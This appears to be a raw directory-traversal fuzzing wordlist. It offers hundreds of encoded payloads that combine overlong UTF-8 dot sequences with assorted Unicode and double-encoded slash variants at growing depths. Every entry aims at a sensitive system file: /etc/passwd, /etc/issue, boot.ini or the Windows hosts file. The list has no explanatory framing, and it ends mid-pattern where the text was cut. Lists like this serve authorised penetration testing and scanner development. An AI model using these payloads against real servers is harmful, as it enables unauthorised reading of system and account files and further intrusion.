-%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215boot.ini -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215passwd -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215issue -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215boot.ini -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215passwd -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215issue -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215boot.ini -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215passwd -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215etc%u2215issue -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215boot.ini -%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215%25c0%25ae%25c0%25ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%25c0%25ae%25c0%25ae%u2216etc%u2216passwd -%25c0%25ae%25c0%25ae%u2216etc%u2216issue -%25c0%25ae%25c0%25ae%u2216boot.ini -%25c0%25ae%25c0%25ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216passwd -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216issue -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216boot.ini -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216passwd -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216issue -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216boot.ini -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216passwd -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216issue -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216boot.ini -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216passwd -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216issue -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216boot.ini -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216passwd -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216etc%u2216issue -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216boot.ini -%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216%25c0%25ae%25c0%25ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8passwd -%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8issue -%25c0%25ae%25c0%25ae%uEFC8boot.ini -%25c0%25ae%25c0%25ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8passwd -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8issue -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8boot.ini -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8passwd -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8issue -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8boot.ini -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8passwd -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8issue -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8boot.ini -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8passwd -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8issue -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8boot.ini -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8passwd -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8etc%uEFC8issue -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8boot.ini -%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8%25c0%25ae%25c0%25ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%25c0%25ae%25c0%25ae%uF025etc%uF025passwd -%25c0%25ae%25c0%25ae%uF025etc%uF025issue -%25c0%25ae%25c0%25ae%uF025boot.ini -%25c0%25ae%25c0%25ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025passwd -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025issue -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025boot.ini -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025passwd -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025issue -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025boot.ini -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025passwd -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025issue -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025boot.ini -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025passwd -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025issue -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025boot.ini -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025passwd -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025etc%uF025issue -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025boot.ini -%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025%25c0%25ae%25c0%25ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66passwd -%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66issue -%25c0%25ae%25c0%25ae%%32%%66boot.ini -%25c0%25ae%25c0%25ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66passwd -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66issue -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66boot.ini -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66passwd -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66issue -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66boot.ini -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66passwd -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66issue -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66boot.ini -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66passwd -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66issue -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66boot.ini -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66passwd -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66etc%%32%%66issue -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66boot.ini -%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66%25c0%25ae%25c0%25ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63passwd -%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63issue -%25c0%25ae%25c0%25ae%%35%%63boot.ini -%25c0%25ae%25c0%25ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63passwd -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63issue -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63boot.ini -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63passwd -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63issue -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63boot.ini -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63passwd -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63issue -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63boot.ini -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63passwd -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63issue -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63boot.ini -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63passwd -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63etc%%35%%63issue -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63boot.ini -%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63%25c0%25ae%25c0%25ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afpasswd -%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afissue -%25c0%25ae%25c0%25ae%e0%80%afboot.ini -%25c0%25ae%25c0%25ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afpasswd -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afissue -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afboot.ini -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afpasswd -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afissue -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afboot.ini -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afpasswd -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afissue -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afboot.ini -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afpasswd -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afissue -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afboot.ini -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afpasswd -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afetc%e0%80%afissue -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afboot.ini -%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%af%25c0%25ae%25c0%25ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cpasswd -%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cissue -%25c0%25ae%25c0%25ae%25c1%259cboot.ini -%25c0%25ae%25c0%25ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cpasswd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cetc%25c1%259cissue -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259cboot.ini 